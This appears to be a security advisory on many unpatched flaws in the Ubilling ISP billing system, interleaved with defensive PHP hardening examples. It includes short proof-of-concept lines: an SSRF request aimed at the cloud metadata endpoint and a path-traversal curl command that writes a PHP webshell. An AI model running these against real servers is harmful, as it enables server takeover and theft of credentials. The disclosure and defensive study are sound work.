Source: https://sploitus.com/exploit?id=55962DC3-5E12-5EC1-9514-C1AA13633B54
# GitHub Security Advisory: Ubilling - Multiple Critical Vulnerabilities (RCE, SSRF, XXE, Path Traversal, 160+ Issues)

---

## Advisory Information

| Field | Value |
|-------|-------|
| **Severity** | Critical |
| **CWE** | CWE-94 (Code Injection) / CWE-918 (SSRF) / CWE-611 (XXE) / CWE-22 (Path Traversal) |
| **CVSS v3.1** | 9.6 (Ghost Mode Session Hijack) / 9.5 (Supply Chain eval RCE) / 9.1 (Path Traversal Arbitrary Write) / 9.0 (Unauth File Upload RCE) |
| **CVSS Vector** | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |

---

## Summary

Ubilling (1,722 PHP files, ISP billing/CMS system) contains **160+ unique vulnerabilities**, making it the most severe codebase audited. Findings include: (1) Remote Code Execution via a supply chain `eval()` backdoor fetching from ubilling.net.ua, (2) Unauthenticated SSRF via the TraffStats image proxy, (3) Path traversal to arbitrary file write/delete via the template editor, (4) Unauthenticated file upload RCE via the messages queue, (5) Complete absence of CSRF protection across all 1,722 files, (6) 50+ XSS vectors, (7) 3 insecure deserialization sinks, (8) 5 XXE vectors, (9) 12 auth bypass/access control issues.

---

## Vulnerability Details

### Affected Package/Repository

- **Repository:** Ubilling (ISP Billing CMS)
- **Affected Versions:** Current
- **Patched Version:** N/A (0-day)
- **Commit Hash (audited):** `82cc673b2cad5dbb1f714f59b8145083e346a8a3`

---

## CVE-REQUEST-001: Supply Chain RCE via Update Server eval() Backdoor (CVSS 9.5)

**File:** `api/libs/api.workaround.php`, line 3560

```php
eval(curl_exec($curlStats));  // Fetches executable PHP from ubilling.net.ua!
```

The auto-update mechanism fetches PHP code from a remote server and passes it directly to `eval()`. This is effectively a built-in backdoor: if the update server is compromised (or the connection is MITM'd), all Ubilling instances are compromised.
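A defensive replacement for this pattern, added here as an example and not taken from Ubilling's code: the updater fetches a JSON manifest and a detached Ed25519 signature over TLS with certificate verification, checks the signature against a key pinned in the install, and treats the result purely as data that is never executed. `UPDATE_PUBKEY_HEX`, the manifest URLs, the manifest fields and all function names are assumptions.

```php
<?php
// Added example, not Ubilling code. Replaces eval(curl_exec(...)) with a
// signed-manifest check. Manifest layout, URLs and the pinned key are assumed.
// Requires ext/sodium (bundled with PHP >= 7.2).

// PLACEHOLDER for the vendor's Ed25519 public key, shipped with the install.
const UPDATE_PUBKEY_HEX = '0000000000000000000000000000000000000000000000000000000000000000';

/** HTTPS GET with certificate checks on and redirects off; null on any failure. */
function https_get(string $url): ?string {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTPS,
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_SSL_VERIFYHOST => 2,
        CURLOPT_FOLLOWLOCATION => false,
        CURLOPT_TIMEOUT        => 15,
    ]);
    $body = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    return ($body !== false && $code === 200) ? $body : null;
}

/**
 * Verifies a detached Ed25519 signature (hex) over the exact manifest bytes,
 * then decodes the manifest as data. Returns the fields the updater acts on,
 * or null if the signature, key or JSON is bad. Nothing here is executed.
 */
function verify_update_manifest(string $json, string $sigHex, string $pubHex): ?array {
    $sig = hex2bin(trim($sigHex));
    $pub = hex2bin(trim($pubHex));
    if ($sig === false || $pub === false
        || strlen($sig) !== SODIUM_CRYPTO_SIGN_BYTES
        || strlen($pub) !== SODIUM_CRYPTO_SIGN_PUBLICKEYBYTES) {
        return null;
    }
    if (!sodium_crypto_sign_verify_detached($sig, $json, $pub)) {
        return null; // tampered, MITM'd, or signed with the wrong key
    }
    try {
        $data = json_decode($json, true, 8, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return null;
    }
    if (!is_array($data) || !isset($data['version'], $data['package_url'], $data['sha256'])) {
        return null;
    }
    // Only known fields are returned. The downloaded package is later hashed
    // against 'sha256' before it is unpacked; it is never passed to eval().
    return [
        'version'     => (string) $data['version'],
        'package_url' => (string) $data['package_url'],
        'sha256'      => strtolower((string) $data['sha256']),
    ];
}

/** Entry point the cron/update job would call instead of eval(curl_exec()). */
function check_for_update(string $baseUrl): ?array {
    $json = https_get($baseUrl . '/manifest.json');
    $sig  = https_get($baseUrl . '/manifest.json.sig');
    if ($json === null || $sig === null) return null;
    return verify_update_manifest($json, $sig, UPDATE_PUBKEY_HEX);
}
```

The signing key stays offline with the vendor; a compromised update server or an on-path attacker can then serve a manifest, but cannot produce one that verifies.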

---

## CVE-REQUEST-002: Unauthenticated SSRF via TraffStats Image Proxy (CVSS 9.1)

**File:** `api/libs/api.traffstats.php`, lines 927-935

```php
$remoteImg = new OmaeUrl(base64_decode(ubRouting::get('...')));
// cURL to ANY URL - no authentication, no URL validation, follows redirects
```

No authentication required. No URL validation. No SSL verification. Follows redirects.

**PoC:**
```
GET /?module=traffstats&action=imgproxy&url=BASE64(http://169.254.169.254/latest/meta-data/)
```
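How an image proxy endpoint like this can be hardened, as an added example that is not Ubilling's `OmaeUrl` or TraffStats code: an http/https scheme allowlist, resolution of the hostname with every returned address checked against private and reserved ranges, the checked address pinned into cURL so a DNS answer cannot change between the check and the fetch, no redirects, and a content-type check on the response. Function names are assumptions; the endpoint must also run the application's own session check first, which is not reproduced here.

```php
<?php
// Added example, not Ubilling code. Function names are assumed.

/** True only for globally routable addresses: rejects RFC1918, loopback,
 *  link-local (169.254.0.0/16, i.e. cloud metadata) and reserved ranges. */
function is_public_ip(string $ip): bool {
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

/** Every address the host resolves to (or the literal IP itself), or []. */
function resolve_host(string $host): array {
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) return [$host];
    $recs = dns_get_record($host, DNS_A | DNS_AAAA) ?: [];
    $ips  = [];
    foreach ($recs as $rec) {
        $ip = $rec['ip'] ?? $rec['ipv6'] ?? null;   // 'ip' for A, 'ipv6' for AAAA
        if ($ip !== null) $ips[] = $ip;
    }
    return $ips;
}

/** Image bytes, or null for anything that is not a plain public http(s) image. */
function fetch_proxied_image(string $url, int $maxBytes = 5 * 1024 * 1024): ?string {
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) return null;
    if (isset($p['user']) || isset($p['pass'])) return null;       // no credentials in URLs
    $scheme = strtolower($p['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') return null;     // no file://, gopher://, ...
    $host = $p['host'];
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);

    $ips = resolve_host($host);
    if ($ips === []) return null;
    foreach ($ips as $ip) {
        if (!is_public_ip($ip)) return null;    // any internal answer fails the whole request
    }

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,                        // a redirect could point inside
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_SSL_VERIFYPEER => true,
        CURLOPT_SSL_VERIFYHOST => 2,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_MAXFILESIZE    => $maxBytes,
        CURLOPT_RESOLVE        => ["$host:$port:{$ips[0]}"],     // pin the address we checked
    ]);
    $body  = curl_exec($ch);
    $code  = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    $ctype = (string) curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    curl_close($ch);
    if ($body === false || $code !== 200 || strncmp($ctype, 'image/', 6) !== 0) return null;
    return $body;
}
```

The `CURLOPT_RESOLVE` pin is what closes the DNS-rebinding gap: without it a hostname can resolve to a public address during the check and to 169.254.169.254 when cURL connects. Bracketed IPv6 literals are not resolved by this code and are therefore refused, which is the safe direction for a proxy.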

---

## CVE-REQUEST-003: Path Traversal - Arbitrary File Write/Delete (CVSS 9.1)

**File:** `api/libs/api.templatize.php`, lines 496-497, 433-434

```php
// WRITE:
function zb_DocsTemplateEdit($template, $title, $body) {
    $edittemplateid = $template;  // FROM $_GET['edittemplate'] - ZERO SANITIZATION
    file_put_contents($headerspath . $edittemplateid, $title);
    file_put_contents($templatespath . $edittemplateid, $body);
}

// DELETE:
function zb_DocsDeleteTemplate($template) {
    rcms_delete_files($headerspath . $_GET['deletetemplate']);  // UNSANITIZED
}
```

**PoC:**
```bash
# Write PHP webshell
curl "http://target/?module=pl_documents&edittemplate=../../../../var/www/html/shell.php" \
  -d "edittemplatetitle=" \
  -d "edittemplatebody="
```
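Fix 3 below says `basename()`; on its own that still leaves the caller free to pick any name in the directory, so the added example here (not Ubilling's `zb_DocsTemplateEdit`/`zb_DocsDeleteTemplate`) combines `basename()` with a strict identifier charset and a `realpath()` containment check, so that even a symlinked existing template cannot resolve outside the template directory. All function names are assumptions; the handlers are meant to run behind the existing admin rights check and a POST-only CSRF check.

```php
<?php
// Added example, not Ubilling code. Function names are assumed.

/**
 * Maps a user-supplied template id to a path strictly inside $baseDir,
 * or returns null. Works for both existing and not-yet-created files.
 */
function safe_template_path(string $baseDir, string $templateId): ?string {
    $name = basename($templateId);                       // drops any directory part
    // Tight identifier charset: no dots, so "." and ".." and hidden files are out.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) return null;

    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) return null;
    $path = $base . DIRECTORY_SEPARATOR . $name;

    // If the target already exists (edit/delete), it must resolve inside $base
    // even through symlinks.
    if (file_exists($path)) {
        $real   = realpath($path);
        $prefix = $base . DIRECTORY_SEPARATOR;
        if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) return null;
    }
    return $path;
}

function docs_template_edit_hardened(string $headersPath, string $templatesPath,
                                     string $templateId, string $title, string $body): bool {
    $h = safe_template_path($headersPath, $templateId);
    $t = safe_template_path($templatesPath, $templateId);
    if ($h === null || $t === null) return false;
    return file_put_contents($h, $title, LOCK_EX) !== false
        && file_put_contents($t, $body, LOCK_EX) !== false;
}

function docs_template_delete_hardened(string $headersPath, string $templatesPath,
                                       string $templateId): bool {
    $h = safe_template_path($headersPath, $templateId);
    $t = safe_template_path($templatesPath, $templateId);
    if ($h === null || $t === null) return false;
    $ok = true;
    foreach ([$h, $t] as $f) {
        if (is_file($f) && !unlink($f)) $ok = false;   // only regular files under the base dir
    }
    return $ok;
}
```

With the identifier restricted to `[A-Za-z0-9_-]`, the `../../../../var/www/html/shell.php` value from the PoC above is rejected before any filesystem call is made.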

---

## CVE-REQUEST-004: Unauthenticated File Upload RCE (CVSS 9.0)

**File:** `api/libs/api.messagesqueue.php`, lines 715-717

```php
move_uploaded_file($_FILES['newmailattach']['tmp_name'], 
    $uploaddir . vf($_FILES['newmailattach']['name']));
```

No extension validation. `vf()` blocks `/` for path traversal but allows any file extension. Upload `.php` webshell directly.
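An upload handler that applies fix 4, as an added example and not Ubilling's messages queue code: an extension allowlist (a denylist would miss variants such as `.phtml` or `.phar`), a content check with `finfo` so the bytes must match the claimed type, and a server-chosen random filename so no user input reaches the path at all. `store_attachment`, `ATTACH_ALLOWED` and the upload directory are assumptions; the handler must additionally require a valid session, which is not reproduced here.

```php
<?php
// Added example, not Ubilling code. store_attachment() and ATTACH_ALLOWED are assumed.

// Extension => MIME type the file contents must actually have.
const ATTACH_ALLOWED = [
    'pdf'  => 'application/pdf',
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
];

/**
 * Stores one uploaded attachment; returns the server-chosen filename or null.
 * $file is one $_FILES entry. The caller has already verified the session.
 */
function store_attachment(array $file, string $uploadDir, int $maxBytes = 10 * 1024 * 1024): ?string {
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) return null;
    $tmp = $file['tmp_name'] ?? '';
    if (!is_uploaded_file($tmp) || ($file['size'] ?? 0) > $maxBytes) return null;

    // 1. Extension allowlist on the client-supplied name.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!isset(ATTACH_ALLOWED[$ext])) return null;

    // 2. The bytes must match the claimed type; the name alone proves nothing.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    if ($mime !== ATTACH_ALLOWED[$ext]) return null;

    // 3. Server-chosen random name: no user input ever reaches the path.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = rtrim($uploadDir, '/') . '/' . $stored;
    if (!move_uploaded_file($tmp, $dest)) return null;
    chmod($dest, 0640);                 // not executable, not world-readable
    return $stored;
}

// Usage inside an authenticated, CSRF-checked POST handler (directory is an example value):
//   $name = store_attachment($_FILES['newmailattach'] ?? [], '/var/lib/ubilling-attachments');
```

The upload directory should sit outside the web root, or have PHP execution disabled in the web server configuration, so that even a mis-classified file can never be executed.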

---

## CVE-REQUEST-005: Ghost Mode Session Hijack via GET (CVSS 9.6)

**File:** `modules/general/permissions/index.php`, line 553

```php
setcookie('ubilling_user', $adminLogin . ':' . $userData['password']);
```

GET-based operation with zero CSRF protection. An attacker can hijack any admin session via a single `` tag.

---

## CVE-REQUEST-006: No CSRF Protection - Entire Codebase (CVSS 9.6)

**File:** `api/libs/api.astral.php`, lines 34-62, `wf_Form()` function

```php
function wf_Form($action, $method, $inputs, ...) {
    return '<form action="' . $action . '" method="' . $method . '">' . $inputs . '</form>';  // NO CSRF TOKEN
}
```

Zero CSRF tokens in all 1,722 PHP files. Every state-changing operation is cross-origin exploitable.
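A token scheme that fix 5 calls for, as an added example and not Ubilling's `wf_Form()`: a per-session random token, a hidden input that the form builder always embeds, and a constant-time check that every state-changing handler runs first. The real `wf_Form()` signature is elided on the page, so the hardened variant here takes three parameters; all names are assumptions. The same `csrf_check()` is what would turn the GET-driven ghost mode of CVE-REQUEST-005 into a POST-only, token-protected operation.

```php
<?php
// Added example, not Ubilling code. All function names are assumed.

/** Per-session token, created once; random_bytes() is CSPRNG-backed. */
function csrf_token(): string {
    if (session_status() !== PHP_SESSION_ACTIVE) session_start();
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_hidden_input(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/** Call at the top of every state-changing handler. */
function csrf_check(): bool {
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') return false;   // no GET-driven state changes
    if (session_status() !== PHP_SESSION_ACTIVE) session_start();
    $sent = $_POST['csrf_token'] ?? '';
    $have = $_SESSION['csrf_token'] ?? '';
    // hash_equals() compares in constant time, so the token cannot be guessed byte by byte.
    return is_string($sent) && $have !== '' && hash_equals($have, $sent);
}

/** Form builder that always embeds the token for POST forms. */
function wf_Form_hardened(string $action, string $method, string $inputs): string {
    $method = strtolower($method) === 'get' ? 'get' : 'post';
    $token  = $method === 'post' ? csrf_hidden_input() : '';
    return '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8')
        . '" method="' . $method . '">' . $token . $inputs . '</form>';
}

// Handler side:
//   if (!csrf_check()) { http_response_code(403); exit; }
```

Because the token lives in the server-side session and is compared there, a cross-origin page can submit the form but cannot read or predict the value it must include. Setting the session cookie with `SameSite=Lax` or `Strict` adds a second, independent layer.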

---

## CVE-REQUEST-007: Insecure Deserialization (3 confirmed sinks) (CVSS 9.0)

**Sink 1** (`modules/general/userreg/index.php:55`):
```php
$newUserData = unserialize(base64_decode(ubRouting::post('repostdata')));
```

**Sink 2** (`api/libs/api.universalqinq.php:545`):
```php
$decode = unserialize(base64_decode($encode));  // POST input
```

**Sink 3** (`api/libs/api.deploy.php:168`):
```php
@$key = unserialize($key);  // XOR-obfuscated with site serial (visible on config page)
```
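Fix 6 offers two routes for these three sinks. The added example below (not Ubilling code) shows both: the preferred one, where the payload is JSON and therefore can only ever yield arrays and scalars, and the transitional one, where the `serialize()` wire format stays but `allowed_classes => false` turns every object into `__PHP_Incomplete_Class`, so no `__wakeup()`/`__destruct()` gadget can run. Function names are assumptions.

```php
<?php
// Added example, not Ubilling code. Function names are assumed.

/** Preferred replacement: JSON carries arrays and scalars only; nothing is instantiated. */
function decode_repost_data(string $b64): ?array {
    $raw = base64_decode($b64, true);   // strict mode rejects non-base64 input
    if ($raw === false) return null;
    try {
        $data = json_decode($raw, true, 16, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        return null;
    }
    return is_array($data) ? $data : null;
}

/** True if any object survives in the decoded structure (recursive). */
function contains_object($value): bool {
    if (is_object($value)) return true;
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_object($item)) return true;
        }
    }
    return false;
}

/**
 * Transitional replacement where the serialize() format must stay for now.
 * allowed_classes => false means objects in the payload become
 * __PHP_Incomplete_Class (no magic methods run); such payloads are then
 * rejected outright, since legitimate data here never contains objects.
 * Returns the decoded value, or null on malformed or object-bearing input.
 */
function unserialize_data_only(string $raw) {
    $data = @unserialize($raw, ['allowed_classes' => false]);
    if ($data === false && $raw !== serialize(false)) return null;  // parse failure
    if (contains_object($data)) return null;
    return $data;
}
```

Moving to JSON also removes the need for the XOR "obfuscation" seen in the deploy sink: the data format itself no longer has any path to code execution, so hiding it buys nothing.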

---

## CVE-REQUEST-008: 50+ XSS Vectors (Reflected + Stored + DOM) (CVSS 8.7)

**Root Cause:** The framework has NO centralized output escaping. `ubRouting::get()`/`post()` default to `raw` mode. The `__()` translation function does not escape. All `wf_*()` form/UI helpers (70+ functions) output raw HTML without escaping.

**Critical XSS:**
- 40+ reflected XSS via direct `echo` of `$_GET`/`$_POST`/`$_SERVER` values
- 25+ stored XSS fields (profile name, whiteboard, tickets, notes, announcements)
- 10+ DOM XSS via `innerHTML` sinks and unescaped JS context (redirects, alerts)
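Fixes 8 and 9 below describe a central escaping layer whose default is safe. The added example here (not Ubilling's `ubRouting` or `wf_*` helpers) shows the shape of such a layer: one escaper per output context (HTML, inline JavaScript, redirect target) and a request getter that returns escaped text unless the caller explicitly asks for `raw`, inverting the default described above. All names are assumptions.

```php
<?php
// Added example, not Ubilling code. e(), e_js(), safe_local_redirect() and
// request_param() are assumed names for a central escaping layer.

/** HTML text and attribute context. */
function e(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Inline-JS context: a JSON string literal that is also safe inside <script>. */
function e_js(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE);
}

/** Redirect context: only same-host relative paths; no CR/LF (header injection). */
function safe_local_redirect(string $target, string $fallback = '/'): string {
    if ($target === '' || $target[0] !== '/' || substr($target, 0, 2) === '//'
        || preg_match('/[\r\n]/', $target)) {
        return $fallback;
    }
    return $target;
}

/**
 * Request getter whose *default* is escaped HTML. 'raw' has to be asked for
 * explicitly, so forgetting the mode can no longer produce an XSS.
 */
function request_param(string $name, string $mode = 'html', ?array $src = null): string {
    $src = $src ?? $_REQUEST;
    $v   = $src[$name] ?? '';
    if (!is_string($v)) return '';
    switch ($mode) {
        case 'int':  return (string) (int) $v;
        case 'js':   return e_js($v);
        case 'raw':  return $v;          // caller takes responsibility for escaping
        default:     return e($v);       // 'html'
    }
}

// Usage:
//   echo '<input name="login" value="' . request_param('login') . '">';
//   echo '<script>var q = ' . request_param('q', 'js') . ';</script>';
//   header('Location: ' . safe_local_redirect(request_param('back', 'raw')));
```

The key property is that each escaper is tied to one output context; HTML escaping alone does not protect a value dropped into a `<script>` block or a `Location:` header, which is why the DOM and redirect vectors above need their own functions.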

---

## Additional Critical Findings (160+ total)

| Category | Count | Max Severity | Key Examples |
|----------|-------|-------------|-------------|
| RCE / Command Injection | 14 | 9.5 | eval via auto-update, mass sender shell_exec, PHP console eval |
| File Upload / Path Traversal | 11 | 9.1 | Template path traversal, unauthenticated upload, vols module |
| Auth Bypass / Access Control | 12 | 9.6 | Ghost mode, payment gateway bypass, MD5 passwords |
| XSS (Reflected + Stored + DOM) | 50+ | 8.7 | No escaping framework, 70+ wf_ helpers vulnerable |
| CSRF | 1,722 files | 9.6 | Zero tokens anywhere |
| Deserialization | 3 | 9.0 | userreg, universalqinq, deploy |
| XXE | 5 | 7.5 | XLSX/ODS readers, KML parser |
| SSRF | 5+ | 9.1 | TraffStats, watchdog, SMS gateways |
| IDOR | 25+ | 9.6 | User annihilation, ghost mode, per-record checks absent |
| Information Disclosure | 7 | 7.5 | phpinfo, debug, .git, E_ALL |
| Weak Cryptography | 4 | 7.5 | MD5 unsalted, SHA1 weak, loose comparison |

---

## Impact

- **Supply chain compromise** via update server eval() backdoor
- **Complete server takeover** via 14 RCE vectors
- **Internal network access** via 5 SSRF vectors
- **File disclosure** via 5 XXE vectors
- **RCE via deserialization** in 3 POP gadget sinks
- **Admin session hijacking** via CSRF + ghost mode
- **Data exfiltration** via 50+ XSS vectors
- **Arbitrary file write** via path traversal and file upload

---

## Patches / Fix

1. **Immediate:** Remove `eval(curl_exec(...))` from auto-update; use signed JSON instead
2. Add authentication to TraffStats image proxy + URL validation + private IP blocking
3. Sanitize `$_GET['edittemplate']` with `basename()` in template editor
4. Add extension whitelist to ALL file upload handlers
5. Add CSRF token generation/validation to ALL forms
6. Replace `unserialize()` with `json_decode()` or add `allowed_classes => false`
7. Add `libxml_disable_entity_loader(true)` before ALL XML parsing
8. Implement centralized output escaping (auto-escape in wf_* functions)
9. Change `ubRouting::get()/post()` default from `raw` to `callback` with `htmlspecialchars`
10. Replace MD5/SHA1 with `password_hash()` + bcrypt
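Fix 7 needs one caveat: `libxml_disable_entity_loader()` is deprecated since PHP 8.0, where external entity loading is already off by default, so calling it unconditionally emits deprecation notices. The added example below (not Ubilling code) is a loader for untrusted XML such as the XLSX/ODS sheet parts and KML files mentioned above that behaves correctly on both sides of that boundary; `parse_xml_safely` is an assumed name.

```php
<?php
// Added example, not Ubilling code. parse_xml_safely() is an assumed name.

/**
 * Loads untrusted XML (XLSX/ODS sheet parts, KML) with no external entity
 * access. Returns null on malformed input or on any document carrying a DTD.
 */
function parse_xml_safely(string $xml): ?DOMDocument {
    if ($xml === '') return null;                      // loadXML('') throws on PHP 8

    // PHP < 8.0: turn the external entity loader off process-wide.
    // PHP >= 8.0: it is off by default and the function is deprecated.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }

    $prevErr = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    // LIBXML_NONET forbids network access during parsing. Never add
    // LIBXML_NOENT (substitutes entities) or LIBXML_DTDLOAD here.
    $ok = $doc->loadXML($xml, LIBXML_NONET | LIBXML_NOERROR | LIBXML_NOWARNING);
    libxml_clear_errors();
    libxml_use_internal_errors($prevErr);
    if (!$ok) return null;

    // None of these formats needs a DOCTYPE; refuse any, so entity
    // declarations (internal or external) never reach the parser's output.
    if ($doc->doctype !== null) return null;
    return $doc;
}
```

The same flags apply to `simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET)` if a reader uses SimpleXML instead of DOM; the DOCTYPE refusal is the part that also defends against billion-laughs style entity expansion, which the entity loader setting alone does not address.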

---

## Disclosure Timeline

- **2026-06-28:** All 160+ vulnerabilities discovered by Fatullayev Asadbek (Kimdir01)
- **TBD:** Reported to Ubilling maintainers
- **TBD:** CVEs requested (MITRE / TuranSec CNE)
- **TBD:** Advisories published

---

## Credits

- Discovered by: Fatullayev Asadbek | GitHub: Kimdir01
- Independent security researcher

---

## References

- CWE-94: Code Injection
- CWE-918: Server-Side Request Forgery
- CWE-22: Path Traversal
- CWE-434: Unrestricted File Upload
- CWE-502: Deserialization of Untrusted Data
- CWE-611: XML External Entity (XXE)
- CWE-352: Cross-Site Request Forgery